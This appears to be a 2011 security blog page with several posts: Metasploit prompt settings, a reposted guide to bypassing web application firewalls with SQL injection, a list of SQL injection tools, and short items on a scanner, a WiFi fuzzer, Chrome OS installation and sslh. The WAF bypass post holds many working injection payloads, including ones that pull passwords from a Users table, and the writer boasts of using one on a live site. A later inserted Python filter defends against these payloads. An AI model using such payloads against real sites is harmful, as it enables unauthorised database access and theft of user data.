Jul 22, 2011

Metasploit Console Customizable Prompts

The Metasploit Console now supports customizable prompts similar to how bash has the PS1 variable. To set a custom prompt the setg command can be used to set the Prompt variable. For example:

msf > setg Prompt "%T - (Sessions: %S Jobs: %J) "
Thu Jul 21 02:25:43 -0400 2011 - (Sessions: 0 Jobs: 0) >

This command displays the timestamp, session count and job count in the prompt. The following variables are available for customizable prompts:

Variables:
%T - Timestamp
%S - Session count
%J - Job count
%H - Hostname of the local machine
%U - Username of the user running msfconsole
%D - Current local directory
%L - Host to use for listeners (same as 0.0.0.0)

Timestamps:
Setting a timestamp initially uses the default Ruby format, e.g. Thu Jul 21 02:25:27 -0400 2011. To alter the formatting of the timestamp, set the PromptTimeFormat variable. For a list of time format options, check the Time class documentation for the strftime function (http://www.ruby-doc.org/core/classes/Time.html#M000392). Here is an example of using the PromptTimeFormat variable to change the timestamp formatting.

setg PromptTimeFormat "%I:%H:%S"
PromptTimeFormat => %I:%H:%S
03:03:00

Additionally, the ending character of the prompt is also configurable. Set the PromptChar variable to change the ending character from the default '>' character.

msf > setg PromptChar "#"
msf #

Once a suitable prompt has been configured the save command will write the global setting to the config file.

setg Prompt "%cya%T%clr - %L (s:%red%S%clr j:%red%J%clr) msf "
Prompt => %T - %L (s:%S j:%J) msf
10:21:51 - 192.168.0.111 (s:0 j:0) msf > save
Saved configuration to: /Users/bannedit/.msf3/config




If you like my blog, Please Donate Me

SQL Injection Bypass WAF

Great article; the source is at the bottom of this post.


1) Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass many of the restrictions of Web application firewalls and to kill certain SQL statements, executing the attacker's commands while commenting out the legitimate query. Some comments in SQL:

//, --, /**/, #, --+, -- -, ;


2) Case Changing:

Some WAFs will filter only lowercase attacks. As we can see, we can easily evade this by changing case.
Possible Regex filter:

/union\sselect/g
id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)


3) Inline Comments:

Some WAFs filter key words like /union\sselect/ig. We can bypass this filter most of the time by using inline comments; more complex cases require a more advanced approach, such as adding SQL keywords that further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point in /*!code*/: MySQL executes the SQL inside such a comment.
Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example, let’s pretend a site filters union, where, table_name, table_schema, =, and information_schema. These are 3 statements we need to inject our target.
For this we would:


id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

The above code would bypass the filter. Notice we can use “like” instead of “=”.
Another way to use inline comments, when everything else seems to fail, is to try to throw the application firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -

The above code should bypass union+select filters even where common inline comments didn’t work.

4) Buffer Overflow / Unexpected input:

A lot of WAFs are written in C, making them prone to overflows or to behaving differently when loaded with a large amount of data. Here is a WAF that does its job correctly, but when given a large amount of data lets the malicious request and response through.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+


This bypass above works. I myself just used this against a Web site recently.

5) Replaced keywords (preg_replace and/or WAFs with the same action):

Sometimes an application will remove every occurrence of a keyword. For instance, let’s say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

id=1+UNIunionON+SeLselectECT+1,2,3--

As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:

UNION+SELECT+1,2,3--


6) Character encoding:

Most WAFs will decode and filter an application's input, but some WAFs decode the input only once. Double encoding can then bypass such filters: the WAF decodes once and filters, while the application keeps decoding the SQL statement and executes our code.
Examples of double encoding:

id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

Some examples of double encoding are:

Single quote (')   %u0027  %u02b9  %u02bc  %u02c8  %u2032  %uff07  %c0%27  %c0%a7  %e0%80%a7
White space        %u0020  %uff00  %c0%20  %c0%a0  %e0%80%a0
(                  %u0028  %uff08  %c0%28  %c0%a8  %e0%80%a8
)                  %u0029  %uff09  %c0%29  %c0%a9  %e0%80%a9

7) Putting it all together:

After bypassing a few WAFs the task gets easier and easier, but here are some ways to find out how to bypass “your” targeted WAF:

7a) Breaking the SQL statement:

To find out exactly what’s filtered you need to break your own SQL syntax and check for keywords being filtered, seeing whether a keyword is filtered alone or only in the presence of other SQL keywords. For instance, if union+select is giving you a Forbidden or an Internal Server Error, try removing Union and see what happens with just Select, and vice versa.

7b) Verbose Errors:

When breaking the SQL syntax you use the errors to guide you on what needs to be done. For instance, suppose we inject the broken syntax (union removed to stop the Forbidden errors):

id=1+Select+1,2,3--

And the error was something like:

Error at line 1 near " "+1,2,3--

We could gather that maybe the word Select is being filtered out and replaced with whitespace. We could confirm this by injecting something like:

sel%0bect+1,2,3

From there we would see whether we get a Select error. If we did, a few more checks will give us the answer we need to bypass this WAF. This is just one of many ways to break down the SQL syntax. You may have to keep breaking it while bypassing different parts.

8) Advanced Bypassing Techniques:

As stated earlier, once you have bypassed a few WAFs it gets easier and easier, and more and more FUN. When one finds himself running into a wall, try going through all the miscreant characters to see what’s allowed and what’s not. These characters can be: [;:{}()*&$/|<>?"'] We can use these characters to possibly craft a working SQL exploit. For instance, during a WAF bypass I was doing, everything was being either filtered or replaced. I noticed that all * were being replaced with whitespace, which meant no inline comments. Union+select was also properly filtered to produce a Forbidden error. In this instance I was able to use the replaced * to craft my exploit like so:

id=1+uni*on+sel*ect+1,2,3--+

When the * were filtered out, the union+select fell right into place. Now, UNunionION+SELselectECT wasn’t working because union and select were not being replaced, only * was. This is a common WAF bypass. Find the replaceable character and you find the exploit.
Some other bypasses:

id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI"On'+'SeL"ECT' <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only


As of MySQL 4.0 it is said that Uni/**/on+Sel/**/ect will not work for bypass, but if the application firewall was customized to Filter /**/ out to whitespace it will work no matter what the version.
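As an added, defender's-side illustration that is not part of the original article: a small Python filter showing what sections 3, 5, 6 and 8 above imply a WAF must do to hold up, namely decode to a fixpoint (double encoding), treat MySQL's /*! */ contents as live SQL (inline comments), ignore case, and inspect the value the backend will actually receive after any rewriting, so a deleted keyword or a deleted * cannot re-form union+select. The function names are my own and the sample inputs are constructed from the payloads shown above.

```python
import re
from urllib.parse import unquote

# Matches UNION ... SELECT on the normalised (lower-cased) text.
UNION_SELECT = re.compile(r"\bunion\b[\s\S]*?\bselect\b")


def normalize(s):
    """Canonical form of one query-string value, computed before any pattern matching."""
    prev = None
    while prev != s:                      # decode until stable: defeats double/triple encoding
        prev, s = s, unquote(s)
    s = re.sub(r"%u([0-9a-f]{4})",        # IIS-style %uXXXX escapes, which unquote() ignores
               lambda m: chr(int(m.group(1), 16)), s, flags=re.I)
    s = s.replace("+", " ")               # form encoding of a space
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL executes /*! ... */ contents
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)            # other comments are mere separators
    s = re.sub(r"[\x00-\x1f\s]+", " ", s) # %0b and friends are whitespace to the SQL parser
    return s.lower()                      # keyword case is irrelevant to SQL


def looks_like_union_select(value):
    """True when the text the database will actually parse contains UNION ... SELECT."""
    return UNION_SELECT.search(normalize(value)) is not None


def rewrite(value, rules, fixpoint):
    """Apply (pattern, replacement) rules; with fixpoint=True repeat until nothing changes."""
    prev = None
    while prev != value:
        prev = value
        for pattern, repl in rules:
            value = re.sub(pattern, repl, value, flags=re.I)
        if not fixpoint:
            break
    return value


def inspect_after_rewrite(value, rules, fixpoint=True):
    """Inspect what the backend will receive, i.e. the rewritten value, never the original."""
    return looks_like_union_select(rewrite(value, rules, fixpoint))


if __name__ == "__main__":
    payload = "id=1+UNIunionON+SeLselectECT+1,2,3--"   # constructed, from section 5 above
    print(rewrite(payload, [(r"union|select", "")], fixpoint=False))   # id=1+UNION+SeLECT+1,2,3--
    print(rewrite(payload, [(r"union|select", "")], fixpoint=True))    # id=1+++1,2,3--
    print(inspect_after_rewrite("id=1+uni*on+sel*ect+1,2,3--+", [(r"\*", "")], fixpoint=False))  # True
```

The single-pass rewrite reproduces exactly the UNION+SeLECT the article describes, while the fixpoint rewrite leaves nothing to execute; the last call shows that re-inspecting after the * deletion catches the section 8 payload.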





Jul 21, 2011

Damn Small SQLi Scanner [DSSS]

Damn Small SQLi Scanner (DSSS) has been made as a PoC where I wanted to show that commercial (SQLi) scanners can be beaten in under 100 lines of code. It supports blind/error SQLi tests, depth-1 crawling and advanced comparison of different response attributes to distinguish blind responses. If you are satisfied with your commercial tool's scanning results, then I believe that you could be even more satisfied with this one. Currently only GET parameters are supported because of the code line restriction.


Download with: git clone https://github.com/stamparm/DSSS/
Source: https://github.com/stamparm/DSSS/


Howto: Install Chrome OS on Macbook AIR

  1. Download the install image from here
  2. Extract the archive using your decompression tool of choice (The Unarchiver for Mac works great)
  3. Burn the image to a USB stick using dd (check the wiki if you need help with this, same as Flow/Vanilla instructions)
  4. Insert both this USB stick and the OS X install drive into your Macbook Air while it’s switched off
  5. Hold the “C” key down and press the power button, you can let go of the “C” key once the Apple logo appears
  6. Once the language selection screen appears, pick the appropriate option and click next
  7. Once the install wizard appears, click Utilities on the bar at the top, and then Terminal
  8. Type the following command without quotes: “umount /dev/disk*”
  9. Type the following command without quotes: “dd if=/dev/rdisk1 of=/dev/rdisk0 bs=4m count=512”
  10. Type the following command without quotes: “bless --device /dev/disk0s2 --setBoot --legacy”
  11. Once it says it’s finished (basically when it says X bytes copied in Y seconds), hold down the power button until your machine switches off
  12. Remove both your USB stick and the OS X install drive
  13. Hit the power button, wait about 22 seconds
Source: http://hexxeh.net/?p=328117760


Jul 20, 2011

WiFuzz - "Smashing APs for fun & profit"

WiFuzz is an 802.11 fuzzer for triggering corner-case situations in the network stack of today's access points.


Source: http://code.google.com/p/wifuzz/wiki/WiFuzz


Jul 19, 2011

SQL Injection Tools List

Supports only Microsoft SQL Server.

sqlmap ( http://sqlmap.sourceforge.net/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.


Pangolin 3.2.3 free edition ( http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip )
Supports: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.


Havij v1.14 Advanced SQL Injection – free version ( http://www.itsecteam.com/files/havij/Havij1.14Free.rar )

SQL Power Injector ( http://www.sqlpowerinjector.com/ )
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.


SQLIer 0.8.2b  ( http://bcable.net/releases.php?sqlier )
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can’t guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.


bsqlbf-v2 ( http://code.google.com/p/bsqlbf-v2/ )
Supports: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.


Marathon Tool ( http://www.codeplex.com/marathontool )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.


Absinthe ( http://www.0x90.org/…inthe/index.php )
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.


pysqlin ( http://code.google.c…source/checkout )
Implemented: Oracle, MySQL and Microsoft SQL Server.


BSQL Hacker ( http://labs.portcull…on/bsql-hacker/ )
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.


SQID ( http://sqid.rubyforge.org/#download)
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the following operations: look for SQL injection in web pages and test submit forms for possible SQL injection vulnerabilities.


WITOOL ( http://witool.sourceforge.net/ )
Implemented: Oracle and Microsoft SQL Server.


sqlsus ( http://sqlsus.sourceforge.net/ )
Supports only MySQL.


DarkMySQLi16.py ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.


mySQLenum ( http://sourceforge.n…ects/mysqlenum/ )
Supports only MySQL.


PRIAMOS ( http://www.priamos-project.com/ )
Supports only Microsoft SQL Server.


FG-Injector Framework ( http://sourceforge.net/projects/injection-fwk/files/ )
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation


SFX-SQLi ( http://www.kachakil.com/ )
Supports only Microsoft SQL Server.


DarkMySQL ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.


ProMSiD Premium ( http://forum.web-def…02&postcount=15 )
Supports only MySQL.


Acunetix WVS  ( http://www.acunetix.com/vulnerability-scanner/download.htm)
Automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.


yInjector ( http://y-osirys.com/…-softwares/id10 )
Supports only MySQL.


Bobcat SQL Injection Tool ( http://www.northern-…pub/bobcat.html )
Safe3 Sql Injector ( http://sourceforge.net/projects/safe3si/)
Supports: HTTP and HTTPS sites; Basic, Digest and NTLM HTTP authentication; GET, POST and Cookie SQL injection.
Databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
SQL injection techniques: blind, error-based, UNION query and force guess.


ExploitMyUnion ( http://sourceforge.n…exploitmyunion/ )

Laudanum ( http://sourceforge.n…jects/laudanum/ )

Hexjector ( http://sourceforge.n…ects/hexjector/ )

WebRaider ( http://code.google.com/p/webraider/ )
Supports only Microsoft SQL Server.  Designed to execute commands on the server (reverse shell).

Toolza 1.0 ( http://bug-track.ru/prog/toolza1.0.rar )
SQL injection supported DB: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird / Interbase



Source: http://www.coresec.org/2011/07/18/sql-injection-scanners/


Jul 18, 2011

SSLH = HTTPS, SSH, and OpenVPN on the same port.

What is it?

sslh accepts HTTPS, SSH and OpenVPN connections on the same port. This makes it possible to connect to an SSH server or an OpenVPN server on port 443 (e.g. from inside a corporate firewall, which almost never blocks port 443) while still serving HTTPS on that port.

Inspiration

This feature had already been implemented as a Perl script.
There are two problems with the Perl sslh:
  • It's in Perl. That means it's pretty RAM hungry, and probably not very fast.
  • It doesn't manage privilege dropping, which is rather questionable.
The obvious solution to both problems was to re-implement it in C, which is what this program is about.

Install me!

sslh has been packaged for Debian, Gentoo, FreeBSD and some other operating systems, so check out your favourite package repository first before installing by hand.
It should also work under Windows with Cygwin.

Source: http://www.rutschle.net/tech/sslh.shtml

